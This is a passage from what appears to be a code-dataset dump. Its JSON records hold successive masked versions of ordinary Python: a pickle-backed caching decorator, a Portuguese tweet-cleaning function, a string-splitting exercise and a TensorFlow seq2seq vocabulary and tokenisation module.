func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n \"\"\"decorator.\"\"\"\n key = self._makekey(func, args, kwargs)\n if self._kvstore.exists(key):\n value_str = self._kvstore.get(key)\n try:\n value = pickle.loads(codecs.decode(value_str.encode(), \"base64\"))\n if self._lifetime is None or time.time() - value['time'] < self._lifetime:\n result = value['data']\n return result\n except: # pylint: disable=W0702\n if not self._fail_silent:\n raise\n\n result = func(*args, **kwargs)\n value = {'time': time.time(), 'data': result}\n value_str = codecs.encode(pickle.dumps(value), \"base64\").decode()\n self._kvstore.set(key, value_str)\n\n return result\n\n @wraps(func)\n async def async_wrapper(*args, **kwargs):\n \"\"\"async decorator.\"\"\"\n key = self._makekey(func, args, kwargs)\n if self._kvstore.exists(key):\n value_str = self._kvstore.get(key)\n try:\n value = pickle.loads(codecs.decode(value_str.encode(), \"base64\"))\n if self._lifetime is None or time.time() - value['time'] < self._lifetime:\n result = value['data']\n return result\n except: # pylint: disable=W0702\n if not self._fail_silent:\n raise\n\n result = await func(*args, **kwargs)\n value = {'time': time.time(), 'data': result}\n value_str = codecs.encode(pickle.dumps(value), \"base64\").decode()\n self._kvstore.set(key, value_str)\n\n return result\n\n if iscoroutinefunction(func):\n return async_wrapper\n return wrapper\n\n @staticmethod\n def makekey(function, *args, **kwargs) -> str:\n \"\"\"creates a unique key based to be used when storing the cache.\n :param function: function\n :param *args: positional args of the function\n :param **kwargs: keyword arguments of the function\n :return: string base64 key\n \"\"\"\n arguments = str((function.__name__, args, kwargs)).strip()\n arguments = arguments.translate(\n str.maketrans('', '', string.punctuation+string.whitespace)\n )\n key = codecs.encode(pickle.dumps(arguments, protocol=0), \"base64\").decode().strip()\n return key\n", "step-ids": [ 3, 4, 5, 6, 7 ] }
[ 3, 4, 5, 6, 7 ]
import nltk tw_dict = {'created_at':[], 'id':[], 'id_str':[], 'full_text':[], 'entities':[], 'source':[], 'user':[], 'lang':[]} def Preprocessing(instancia): # Remove caracteres indesejados. instancia = re.sub(r"#\S+", "", instancia) instancia = re.sub(r"@\S+", "", instancia).lower().replace('.','').replace(';','').replace('-','').replace(':','').replace(')','').replace('"','').replace(',','') # Removendo palavras e termos frequentes que não tem relevância nos dados. stopwords = set(nltk.corpus.stopwords.words('portuguese')) palavras = [i for i in instancia.split() if not i in stopwords] return (" ".join(palavras))
normal
{ "blob_id": "bffd211a2d2dc3dd9b596f69909be7f0437ab0c8", "index": 9322, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef Preprocessing(instancia):\n instancia = re.sub('#\\\\S+', '', instancia)\n instancia = re.sub('@\\\\S+', '', instancia).lower().replace('.', ''\n ).replace(';', '').replace('-', '').replace(':', '').replace(')', ''\n ).replace('\"', '').replace(',', '')\n stopwords = set(nltk.corpus.stopwords.words('portuguese'))\n palavras = [i for i in instancia.split() if not i in stopwords]\n return ' '.join(palavras)\n", "step-3": "<mask token>\ntw_dict = {'created_at': [], 'id': [], 'id_str': [], 'full_text': [],\n 'entities': [], 'source': [], 'user': [], 'lang': []}\n\n\ndef Preprocessing(instancia):\n instancia = re.sub('#\\\\S+', '', instancia)\n instancia = re.sub('@\\\\S+', '', instancia).lower().replace('.', ''\n ).replace(';', '').replace('-', '').replace(':', '').replace(')', ''\n ).replace('\"', '').replace(',', '')\n stopwords = set(nltk.corpus.stopwords.words('portuguese'))\n palavras = [i for i in instancia.split() if not i in stopwords]\n return ' '.join(palavras)\n", "step-4": "import nltk\ntw_dict = {'created_at': [], 'id': [], 'id_str': [], 'full_text': [],\n 'entities': [], 'source': [], 'user': [], 'lang': []}\n\n\ndef Preprocessing(instancia):\n instancia = re.sub('#\\\\S+', '', instancia)\n instancia = re.sub('@\\\\S+', '', instancia).lower().replace('.', ''\n ).replace(';', '').replace('-', '').replace(':', '').replace(')', ''\n ).replace('\"', '').replace(',', '')\n stopwords = set(nltk.corpus.stopwords.words('portuguese'))\n palavras = [i for i in instancia.split() if not i in stopwords]\n return ' '.join(palavras)\n", "step-5": "import nltk\n\ntw_dict = {'created_at':[],\n 'id':[],\n 'id_str':[],\n 'full_text':[],\n 'entities':[],\n 'source':[],\n 'user':[],\n 'lang':[]}\n\ndef Preprocessing(instancia):\n # Remove caracteres indesejados.\n instancia = re.sub(r\"#\\S+\", \"\", instancia)\n instancia = re.sub(r\"@\\S+\", \"\", instancia).lower().replace('.','').replace(';','').replace('-','').replace(':','').replace(')','').replace('\"','').replace(',','')\n # Removendo palavras e termos frequentes que não tem relevância nos dados.\n stopwords = set(nltk.corpus.stopwords.words('portuguese'))\n palavras = [i for i in instancia.split() if not i in stopwords]\n return (\" \".join(palavras))", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
t = eval(input()) while t: t -= 1 y = [] z = [] x = str(input()) for i in range(len(x)): if (not int(i)%2): y.append(x[i]) else: z.append(x[i]) print("".join(y) + " " + "".join(z))
normal
{ "blob_id": "ac32fb5fcd71790f9dbf0794992a9dc92a202c9b", "index": 7972, "step-1": "<mask token>\n", "step-2": "<mask token>\nwhile t:\n t -= 1\n y = []\n z = []\n x = str(input())\n for i in range(len(x)):\n if not int(i) % 2:\n y.append(x[i])\n else:\n z.append(x[i])\n print(''.join(y) + ' ' + ''.join(z))\n", "step-3": "t = eval(input())\nwhile t:\n t -= 1\n y = []\n z = []\n x = str(input())\n for i in range(len(x)):\n if not int(i) % 2:\n y.append(x[i])\n else:\n z.append(x[i])\n print(''.join(y) + ' ' + ''.join(z))\n", "step-4": "t = eval(input())\nwhile t:\n t -= 1\n y = []\n z = []\n x = str(input())\n for i in range(len(x)):\n if (not int(i)%2):\n y.append(x[i])\n else:\n z.append(x[i])\n print(\"\".join(y) + \" \" + \"\".join(z))\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
# Copyright 2015 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import re import json from tensorflow.python.platform import gfile import tensorflow as tf # Special vocabulary symbols - we always put them at the start. _PAD = b"_PAD" _GO = b"_GO" _EOS = b"_EOS" _UNK = b"_UNK" _START_VOCAB = [_PAD, _GO, _EOS, _UNK] PAD_ID = 0 GO_ID = 1 EOS_ID = 2 UNK_ID = 3 # Regular expressions used to tokenize. _WORD_SPLIT = re.compile(b"([.,!?\"':;)(])") _DIGIT_RE = re.compile(br"\d") def get_qa_set(directory, jsonl_file): """Download the WMT en-fr training corpus to directory unless it's there.""" set_name = os.path.splitext(os.path.basename(jsonl_file))[0] set_path = os.path.join(directory, set_name) src_path = set_path + '.src' targ_path = set_path + '.targ' if gfile.Exists(src_path) and gfile.Exists(targ_path): return set_path with open(jsonl_file, 'r') as qafile, open(src_path,'w') as srcfile, open(targ_path,'w') as targfile: for line in qafile: lcontent = json.loads(line) srcfile.write(lcontent['q'].replace('\n', '') + '\n') targfile.write(lcontent['a'].replace('\n', '') + '\n') return set_path def basic_tokenizer(sentence): """Very basic tokenizer: split the sentence into a list of tokens.""" words = [] for space_separated_fragment in sentence.strip().split(): words.extend(_WORD_SPLIT.split(space_separated_fragment)) return [w for w in words if w] def create_vocabulary(vocabulary_path, json_vocab_path): """Create vocabulary file (if it does not exist yet) from data file. Data file is assumed to contain one sentence per line. Each sentence is tokenized and digits are normalized (if normalize_digits is set). Vocabulary contains the most-frequent tokens up to max_vocabulary_size. We write it to vocabulary_path in a one-token-per-line format, so that later token in the first line gets id=0, second line gets id=1, and so on. Args: vocabulary_path: path where the vocabulary will be created. json_vocab_path: data file that will be used to create vocabulary. """ if not gfile.Exists(vocabulary_path): print("Transform vocabulary to %s" % vocabulary_path) with gfile.GFile(json_vocab_path, mode="rb") as f: jvocab = json.load(f) vocab = jvocab['w2id'] vocab_list = _START_VOCAB + sorted(vocab, key=vocab.get) with gfile.GFile(vocabulary_path, mode="wb") as vocab_file: for w in vocab_list: vocab_file.write(w + b"\n") def initialize_vocabulary(vocabulary_path): """Initialize vocabulary from file. We assume the vocabulary is stored one-item-per-line, so a file: dog cat will result in a vocabulary {"dog": 0, "cat": 1}, and this function will also return the reversed-vocabulary ["dog", "cat"]. Args: vocabulary_path: path to the file containing the vocabulary. Returns: a pair: the vocabulary (a dictionary mapping string to integers), and the reversed vocabulary (a list, which reverses the vocabulary mapping). Raises: ValueError: if the provided vocabulary_path does not exist. """ if gfile.Exists(vocabulary_path): rev_vocab = [] with gfile.GFile(vocabulary_path, mode="rb") as f: rev_vocab.extend(f.readlines()) rev_vocab = [line.strip() for line in rev_vocab] vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)]) return vocab, rev_vocab else: raise ValueError("Vocabulary file %s not found.", vocabulary_path) def sentence_to_token_ids(sentence, vocabulary): """Convert a string to list of integers representing token-ids. For example, a sentence "I have a dog" may become tokenized into ["I", "have", "a", "dog"] and with vocabulary {"I": 1, "have": 2, "a": 4, "dog": 7"} this function will return [1, 2, 4, 7]. Args: sentence: the sentence in bytes format to convert to token-ids. vocabulary: a dictionary mapping tokens to integers. Returns: a list of integers, the token-ids for the sentence. """ return [vocabulary.get(w, UNK_ID) for w in sentence.strip().split()] def data_to_token_ids(data_path, target_path, vocabulary_path): """Tokenize data file and turn into token-ids using given vocabulary file. This function loads data line-by-line from data_path, calls the above sentence_to_token_ids, and saves the result to target_path. See comment for sentence_to_token_ids on the details of token-ids format. Args: data_path: path to the data file in one-sentence-per-line format. target_path: path where the file with token-ids will be created. vocabulary_path: path to the vocabulary file. """ if not gfile.Exists(target_path): print("Tokenizing data in %s" % data_path) vocab, _ = initialize_vocabulary(vocabulary_path) with gfile.GFile(data_path, mode="rb") as data_file: with gfile.GFile(target_path, mode="w") as tokens_file: counter = 0 for line in data_file: counter += 1 if counter % 100000 == 0: print(" tokenizing line %d" % counter) token_ids = sentence_to_token_ids(tf.compat.as_bytes(line), vocab) tokens_file.write(" ".join([str(tok) for tok in token_ids]) + "\n") def prepare_jsonlbpe_data(data_dir, train_data_file, dev_data_file, vocab_file): """Get WMT data into data_dir, create vocabularies and tokenize data. Args: data_dir: directory in which the data sets will be stored. train_data_file: jsonl data file. dev_data_file: jsonl data file. vocab_file: bpe json vocab Returns: A tuple of 6 elements: (1) path to the token-ids for src training data-set, (2) path to the token-ids for target training data-set, (3) path to the token-ids for src development data-set, (4) path to the token-ids for src development data-set, (5) path to the src vocabulary file, (6) path to the src vocabulary file. """ if not gfile.Exists(data_dir): gfile.MkDir(data_dir) # Get wmt data to the specified directory. train_path = get_qa_set(data_dir, train_data_file) dev_path = get_qa_set(data_dir, dev_data_file) # Create vocabularies of the appropriate sizes. vocab_path = os.path.join(data_dir, "vocab.txt") create_vocabulary(vocab_path, vocab_file) # Create token ids for the training data. src_train_ids_path = train_path + ".src.ids" targ_train_ids_path = train_path + ".targ.ids" data_to_token_ids(train_path + ".src", src_train_ids_path, vocab_path) data_to_token_ids(train_path + ".targ", targ_train_ids_path, vocab_path) # Create token ids for the development data. src_dev_ids_path = dev_path + ".src.ids" targ_dev_ids_path = dev_path + ".targ.ids" data_to_token_ids(dev_path + ".src", src_dev_ids_path, vocab_path) data_to_token_ids(dev_path + ".targ", targ_dev_ids_path, vocab_path) return (src_train_ids_path, targ_train_ids_path, src_dev_ids_path, targ_dev_ids_path, vocab_path)
normal
{ "blob_id": "bf51da12632013c62aa543ae7f02415057138c7a", "index": 694, "step-1": "<mask token>\n\n\ndef get_qa_set(directory, jsonl_file):\n \"\"\"Download the WMT en-fr training corpus to directory unless it's there.\"\"\"\n set_name = os.path.splitext(os.path.basename(jsonl_file))[0]\n set_path = os.path.join(directory, set_name)\n src_path = set_path + '.src'\n targ_path = set_path + '.targ'\n if gfile.Exists(src_path) and gfile.Exists(targ_path):\n return set_path\n with open(jsonl_file, 'r') as qafile, open(src_path, 'w') as srcfile, open(\n targ_path, 'w') as targfile:\n for line in qafile:\n lcontent = json.loads(line)\n srcfile.write(lcontent['q'].replace('\\n', '') + '\\n')\n targfile.write(lcontent['a'].replace('\\n', '') + '\\n')\n return set_path\n\n\n<mask token>\n\n\ndef prepare_jsonlbpe_data(data_dir, train_data_file, dev_data_file, vocab_file\n ):\n \"\"\"Get WMT data into data_dir, create vocabularies and tokenize data.\n\n Args:\n data_dir: directory in which the data sets will be stored.\n train_data_file: jsonl data file.\n dev_data_file: jsonl data file.\n vocab_file: bpe json vocab\n\n Returns:\n A tuple of 6 elements:\n (1) path to the token-ids for src training data-set,\n (2) path to the token-ids for target training data-set,\n (3) path to the token-ids for src development data-set,\n (4) path to the token-ids for src development data-set,\n (5) path to the src vocabulary file,\n (6) path to the src vocabulary file.\n \"\"\"\n if not gfile.Exists(data_dir):\n gfile.MkDir(data_dir)\n train_path = get_qa_set(data_dir, train_data_file)\n dev_path = get_qa_set(data_dir, dev_data_file)\n vocab_path = os.path.join(data_dir, 'vocab.txt')\n create_vocabulary(vocab_path, vocab_file)\n src_train_ids_path = train_path + '.src.ids'\n targ_train_ids_path = train_path + '.targ.ids'\n data_to_token_ids(train_path + '.src', src_train_ids_path, vocab_path)\n data_to_token_ids(train_path + '.targ', targ_train_ids_path, vocab_path)\n src_dev_ids_path = dev_path + '.src.ids'\n targ_dev_ids_path = dev_path + '.targ.ids'\n data_to_token_ids(dev_path + '.src', src_dev_ids_path, vocab_path)\n data_to_token_ids(dev_path + '.targ', targ_dev_ids_path, vocab_path)\n return (src_train_ids_path, targ_train_ids_path, src_dev_ids_path,\n targ_dev_ids_path, vocab_path)\n", "step-2": "<mask token>\n\n\ndef get_qa_set(directory, jsonl_file):\n \"\"\"Download the WMT en-fr training corpus to directory unless it's there.\"\"\"\n set_name = os.path.splitext(os.path.basename(jsonl_file))[0]\n set_path = os.path.join(directory, set_name)\n src_path = set_path + '.src'\n targ_path = set_path + '.targ'\n if gfile.Exists(src_path) and gfile.Exists(targ_path):\n return set_path\n with open(jsonl_file, 'r') as qafile, open(src_path, 'w') as srcfile, open(\n targ_path, 'w') as targfile:\n for line in qafile:\n lcontent = json.loads(line)\n srcfile.write(lcontent['q'].replace('\\n', '') + '\\n')\n targfile.write(lcontent['a'].replace('\\n', '') + '\\n')\n return set_path\n\n\ndef basic_tokenizer(sentence):\n \"\"\"Very basic tokenizer: split the sentence into a list of tokens.\"\"\"\n words = []\n for space_separated_fragment in sentence.strip().split():\n words.extend(_WORD_SPLIT.split(space_separated_fragment))\n return [w for w in words if w]\n\n\n<mask token>\n\n\ndef prepare_jsonlbpe_data(data_dir, train_data_file, dev_data_file, vocab_file\n ):\n \"\"\"Get WMT data into data_dir, create vocabularies and tokenize data.\n\n Args:\n data_dir: directory in which the data sets will be stored.\n train_data_file: jsonl data file.\n dev_data_file: jsonl data file.\n vocab_file: bpe json vocab\n\n Returns:\n A tuple of 6 elements:\n (1) path to the token-ids for src training data-set,\n (2) path to the token-ids for target training data-set,\n (3) path to the token-ids for src development data-set,\n (4) path to the token-ids for src development data-set,\n (5) path to the src vocabulary file,\n (6) path to the src vocabulary file.\n \"\"\"\n if not gfile.Exists(data_dir):\n gfile.MkDir(data_dir)\n train_path = get_qa_set(data_dir, train_data_file)\n dev_path = get_qa_set(data_dir, dev_data_file)\n vocab_path = os.path.join(data_dir, 'vocab.txt')\n create_vocabulary(vocab_path, vocab_file)\n src_train_ids_path = train_path + '.src.ids'\n targ_train_ids_path = train_path + '.targ.ids'\n data_to_token_ids(train_path + '.src', src_train_ids_path, vocab_path)\n data_to_token_ids(train_path + '.targ', targ_train_ids_path, vocab_path)\n src_dev_ids_path = dev_path + '.src.ids'\n targ_dev_ids_path = dev_path + '.targ.ids'\n data_to_token_ids(dev_path + '.src', src_dev_ids_path, vocab_path)\n data_to_token_ids(dev_path + '.targ', targ_dev_ids_path, vocab_path)\n return (src_train_ids_path, targ_train_ids_path, src_dev_ids_path,\n targ_dev_ids_path, vocab_path)\n", "step-3": "<mask token>\n\n\ndef get_qa_set(directory, jsonl_file):\n \"\"\"Download the WMT en-fr training corpus to directory unless it's there.\"\"\"\n set_name = os.path.splitext(os.path.basename(jsonl_file))[0]\n set_path = os.path.join(directory, set_name)\n src_path = set_path + '.src'\n targ_path = set_path + '.targ'\n if gfile.Exists(src_path) and gfile.Exists(targ_path):\n return set_path\n with open(jsonl_file, 'r') as qafile, open(src_path, 'w') as srcfile, open(\n targ_path, 'w') as targfile:\n for line in qafile:\n lcontent = json.loads(line)\n srcfile.write(lcontent['q'].replace('\\n', '') + '\\n')\n targfile.write(lcontent['a'].replace('\\n', '') + '\\n')\n return set_path\n\n\ndef basic_tokenizer(sentence):\n \"\"\"Very basic tokenizer: split the sentence into a list of tokens.\"\"\"\n words = []\n for space_separated_fragment in sentence.strip().split():\n words.extend(_WORD_SPLIT.split(space_separated_fragment))\n return [w for w in words if w]\n\n\ndef create_vocabulary(vocabulary_path, json_vocab_path):\n \"\"\"Create vocabulary file (if it does not exist yet) from data file.\n\n Data file is assumed to contain one sentence per line. Each sentence is\n tokenized and digits are normalized (if normalize_digits is set).\n Vocabulary contains the most-frequent tokens up to max_vocabulary_size.\n We write it to vocabulary_path in a one-token-per-line format, so that later\n token in the first line gets id=0, second line gets id=1, and so on.\n\n Args:\n vocabulary_path: path where the vocabulary will be created.\n json_vocab_path: data file that will be used to create vocabulary.\n \"\"\"\n if not gfile.Exists(vocabulary_path):\n print('Transform vocabulary to %s' % vocabulary_path)\n with gfile.GFile(json_vocab_path, mode='rb') as f:\n jvocab = json.load(f)\n vocab = jvocab['w2id']\n vocab_list = _START_VOCAB + sorted(vocab, key=vocab.get)\n with gfile.GFile(vocabulary_path, mode='wb') as vocab_file:\n for w in vocab_list:\n vocab_file.write(w + b'\\n')\n\n\ndef initialize_vocabulary(vocabulary_path):\n \"\"\"Initialize vocabulary from file.\n\n We assume the vocabulary is stored one-item-per-line, so a file:\n dog\n cat\n will result in a vocabulary {\"dog\": 0, \"cat\": 1}, and this function will\n also return the reversed-vocabulary [\"dog\", \"cat\"].\n\n Args:\n vocabulary_path: path to the file containing the vocabulary.\n\n Returns:\n a pair: the vocabulary (a dictionary mapping string to integers), and\n the reversed vocabulary (a list, which reverses the vocabulary mapping).\n\n Raises:\n ValueError: if the provided vocabulary_path does not exist.\n \"\"\"\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode='rb') as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in rev_vocab]\n vocab = dict([(x, y) for y, x in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError('Vocabulary file %s not found.', vocabulary_path)\n\n\ndef sentence_to_token_ids(sentence, vocabulary):\n \"\"\"Convert a string to list of integers representing token-ids.\n\n For example, a sentence \"I have a dog\" may become tokenized into\n [\"I\", \"have\", \"a\", \"dog\"] and with vocabulary {\"I\": 1, \"have\": 2,\n \"a\": 4, \"dog\": 7\"} this function will return [1, 2, 4, 7].\n\n Args:\n sentence: the sentence in bytes format to convert to token-ids.\n vocabulary: a dictionary mapping tokens to integers.\n\n Returns:\n a list of integers, the token-ids for the sentence.\n \"\"\"\n return [vocabulary.get(w, UNK_ID) for w in sentence.strip().split()]\n\n\ndef data_to_token_ids(data_path, target_path, vocabulary_path):\n \"\"\"Tokenize data file and turn into token-ids using given vocabulary file.\n\n This function loads data line-by-line from data_path, calls the above\n sentence_to_token_ids, and saves the result to target_path. See comment\n for sentence_to_token_ids on the details of token-ids format.\n\n Args:\n data_path: path to the data file in one-sentence-per-line format.\n target_path: path where the file with token-ids will be created.\n vocabulary_path: path to the vocabulary file.\n \"\"\"\n if not gfile.Exists(target_path):\n print('Tokenizing data in %s' % data_path)\n vocab, _ = initialize_vocabulary(vocabulary_path)\n with gfile.GFile(data_path, mode='rb') as data_file:\n with gfile.GFile(target_path, mode='w') as tokens_file:\n counter = 0\n for line in data_file:\n counter += 1\n if counter % 100000 == 0:\n print(' tokenizing line %d' % counter)\n token_ids = sentence_to_token_ids(tf.compat.as_bytes(\n line), vocab)\n tokens_file.write(' '.join([str(tok) for tok in\n token_ids]) + '\\n')\n\n\ndef prepare_jsonlbpe_data(data_dir, train_data_file, dev_data_file, vocab_file\n ):\n \"\"\"Get WMT data into data_dir, create vocabularies and tokenize data.\n\n Args:\n data_dir: directory in which the data sets will be stored.\n train_data_file: jsonl data file.\n dev_data_file: jsonl data file.\n vocab_file: bpe json vocab\n\n Returns:\n A tuple of 6 elements:\n (1) path to the token-ids for src training data-set,\n (2) path to the token-ids for target training data-set,\n (3) path to the token-ids for src development data-set,\n (4) path to the token-ids for src development data-set,\n (5) path to the src vocabulary file,\n (6) path to the src vocabulary file.\n \"\"\"\n if not gfile.Exists(data_dir):\n gfile.MkDir(data_dir)\n train_path = get_qa_set(data_dir, train_data_file)\n dev_path = get_qa_set(data_dir, dev_data_file)\n vocab_path = os.path.join(data_dir, 'vocab.txt')\n create_vocabulary(vocab_path, vocab_file)\n src_train_ids_path = train_path + '.src.ids'\n targ_train_ids_path = train_path + '.targ.ids'\n data_to_token_ids(train_path + '.src', src_train_ids_path, vocab_path)\n data_to_token_ids(train_path + '.targ', targ_train_ids_path, vocab_path)\n src_dev_ids_path = dev_path + '.src.ids'\n targ_dev_ids_path = dev_path + '.targ.ids'\n data_to_token_ids(dev_path + '.src', src_dev_ids_path, vocab_path)\n data_to_token_ids(dev_path + '.targ', targ_dev_ids_path, vocab_path)\n return (src_train_ids_path, targ_train_ids_path, src_dev_ids_path,\n targ_dev_ids_path, vocab_path)\n", "step-4": "<mask token>\n_PAD = b'_PAD'\n_GO = b'_GO'\n_EOS = b'_EOS'\n_UNK = b'_UNK'\n_START_VOCAB = [_PAD, _GO, _EOS, _UNK]\nPAD_ID = 0\nGO_ID = 1\nEOS_ID = 2\nUNK_ID = 3\n_WORD_SPLIT = re.compile(b'([.,!?\"\\':;)(])')\n_DIGIT_RE = re.compile(b'\\\\d')\n\n\ndef get_qa_set(directory, jsonl_file):\n \"\"\"Download the WMT en-fr training corpus to directory unless it's there.\"\"\"\n set_name = os.path.splitext(os.path.basename(jsonl_file))[0]\n set_path = os.path.join(directory, set_name)\n src_path = set_path + '.src'\n targ_path = set_path + '.targ'\n if gfile.Exists(src_path) and gfile.Exists(targ_path):\n return set_path\n with open(jsonl_file, 'r') as qafile, open(src_path, 'w') as srcfile, open(\n targ_path, 'w') as targfile:\n for line in qafile:\n lcontent = json.loads(line)\n srcfile.write(lcontent['q'].replace('\\n', '') + '\\n')\n targfile.write(lcontent['a'].replace('\\n', '') + '\\n')\n return set_path\n\n\ndef basic_tokenizer(sentence):\n \"\"\"Very basic tokenizer: split the sentence into a list of tokens.\"\"\"\n words = []\n for space_separated_fragment in sentence.strip().split():\n words.extend(_WORD_SPLIT.split(space_separated_fragment))\n return [w for w in words if w]\n\n\ndef create_vocabulary(vocabulary_path, json_vocab_path):\n \"\"\"Create vocabulary file (if it does not exist yet) from data file.\n\n Data file is assumed to contain one sentence per line. Each sentence is\n tokenized and digits are normalized (if normalize_digits is set).\n Vocabulary contains the most-frequent tokens up to max_vocabulary_size.\n We write it to vocabulary_path in a one-token-per-line format, so that later\n token in the first line gets id=0, second line gets id=1, and so on.\n\n Args:\n vocabulary_path: path where the vocabulary will be created.\n json_vocab_path: data file that will be used to create vocabulary.\n \"\"\"\n if not gfile.Exists(vocabulary_path):\n print('Transform vocabulary to %s' % vocabulary_path)\n with gfile.GFile(json_vocab_path, mode='rb') as f:\n jvocab = json.load(f)\n vocab = jvocab['w2id']\n vocab_list = _START_VOCAB + sorted(vocab, key=vocab.get)\n with gfile.GFile(vocabulary_path, mode='wb') as vocab_file:\n for w in vocab_list:\n vocab_file.write(w + b'\\n')\n\n\ndef initialize_vocabulary(vocabulary_path):\n \"\"\"Initialize vocabulary from file.\n\n We assume the vocabulary is stored one-item-per-line, so a file:\n dog\n cat\n will result in a vocabulary {\"dog\": 0, \"cat\": 1}, and this function will\n also return the reversed-vocabulary [\"dog\", \"cat\"].\n\n Args:\n vocabulary_path: path to the file containing the vocabulary.\n\n Returns:\n a pair: the vocabulary (a dictionary mapping string to integers), and\n the reversed vocabulary (a list, which reverses the vocabulary mapping).\n\n Raises:\n ValueError: if the provided vocabulary_path does not exist.\n \"\"\"\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode='rb') as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in rev_vocab]\n vocab = dict([(x, y) for y, x in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError('Vocabulary file %s not found.', vocabulary_path)\n\n\ndef sentence_to_token_ids(sentence, vocabulary):\n \"\"\"Convert a string to list of integers representing token-ids.\n\n For example, a sentence \"I have a dog\" may become tokenized into\n [\"I\", \"have\", \"a\", \"dog\"] and with vocabulary {\"I\": 1, \"have\": 2,\n \"a\": 4, \"dog\": 7\"} this function will return [1, 2, 4, 7].\n\n Args:\n sentence: the sentence in bytes format to convert to token-ids.\n vocabulary: a dictionary mapping tokens to integers.\n\n Returns:\n a list of integers, the token-ids for the sentence.\n \"\"\"\n return [vocabulary.get(w, UNK_ID) for w in sentence.strip().split()]\n\n\ndef data_to_token_ids(data_path, target_path, vocabulary_path):\n \"\"\"Tokenize data file and turn into token-ids using given vocabulary file.\n\n This function loads data line-by-line from data_path, calls the above\n sentence_to_token_ids, and saves the result to target_path. See comment\n for sentence_to_token_ids on the details of token-ids format.\n\n Args:\n data_path: path to the data file in one-sentence-per-line format.\n target_path: path where the file with token-ids will be created.\n vocabulary_path: path to the vocabulary file.\n \"\"\"\n if not gfile.Exists(target_path):\n print('Tokenizing data in %s' % data_path)\n vocab, _ = initialize_vocabulary(vocabulary_path)\n with gfile.GFile(data_path, mode='rb') as data_file:\n with gfile.GFile(target_path, mode='w') as tokens_file:\n counter = 0\n for line in data_file:\n counter += 1\n if counter % 100000 == 0:\n print(' tokenizing line %d' % counter)\n token_ids = sentence_to_token_ids(tf.compat.as_bytes(\n line), vocab)\n tokens_file.write(' '.join([str(tok) for tok in\n token_ids]) + '\\n')\n\n\ndef prepare_jsonlbpe_data(data_dir, train_data_file, dev_data_file, vocab_file\n ):\n \"\"\"Get WMT data into data_dir, create vocabularies and tokenize data.\n\n Args:\n data_dir: directory in which the data sets will be stored.\n train_data_file: jsonl data file.\n dev_data_file: jsonl data file.\n vocab_file: bpe json vocab\n\n Returns:\n A tuple of 6 elements:\n (1) path to the token-ids for src training data-set,\n (2) path to the token-ids for target training data-set,\n (3) path to the token-ids for src development data-set,\n (4) path to the token-ids for src development data-set,\n (5) path to the src vocabulary file,\n (6) path to the src vocabulary file.\n \"\"\"\n if not gfile.Exists(data_dir):\n gfile.MkDir(data_dir)\n train_path = get_qa_set(data_dir, train_data_file)\n dev_path = get_qa_set(data_dir, dev_data_file)\n vocab_path = os.path.join(data_dir, 'vocab.txt')\n create_vocabulary(vocab_path, vocab_file)\n src_train_ids_path = train_path + '.src.ids'\n targ_train_ids_path = train_path + '.targ.ids'\n data_to_token_ids(train_path + '.src', src_train_ids_path, vocab_path)\n data_to_token_ids(train_path + '.targ', targ_train_ids_path, vocab_path)\n src_dev_ids_path = dev_path + '.src.ids'\n targ_dev_ids_path = dev_path + '.targ.ids'\n data_to_token_ids(dev_path + '.src', src_dev_ids_path, vocab_path)\n data_to_token_ids(dev_path + '.targ', targ_dev_ids_path, vocab_path)\n return (src_train_ids_path, targ_train_ids_path, src_dev_ids_path,\n targ_dev_ids_path, vocab_path)\n", "step-5": "# Copyright 2015 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport re\nimport json\n\nfrom tensorflow.python.platform import gfile\nimport tensorflow as tf\n\n# Special vocabulary symbols - we always put them at the start.\n_PAD = b\"_PAD\"\n_GO = b\"_GO\"\n_EOS = b\"_EOS\"\n_UNK = b\"_UNK\"\n_START_VOCAB = [_PAD, _GO, _EOS, _UNK]\n\nPAD_ID = 0\nGO_ID = 1\nEOS_ID = 2\nUNK_ID = 3\n\n# Regular expressions used to tokenize.\n_WORD_SPLIT = re.compile(b\"([.,!?\\\"':;)(])\")\n_DIGIT_RE = re.compile(br\"\\d\")\n\n\ndef get_qa_set(directory, jsonl_file):\n \"\"\"Download the WMT en-fr training corpus to directory unless it's there.\"\"\"\n set_name = os.path.splitext(os.path.basename(jsonl_file))[0]\n set_path = os.path.join(directory, set_name)\n src_path = set_path + '.src'\n targ_path = set_path + '.targ'\n if gfile.Exists(src_path) and gfile.Exists(targ_path):\n return set_path\n with open(jsonl_file, 'r') as qafile, open(src_path,'w') as srcfile, open(targ_path,'w') as targfile:\n for line in qafile:\n lcontent = json.loads(line)\n srcfile.write(lcontent['q'].replace('\\n', '') + '\\n')\n targfile.write(lcontent['a'].replace('\\n', '') + '\\n')\n return set_path\n\n\ndef basic_tokenizer(sentence):\n 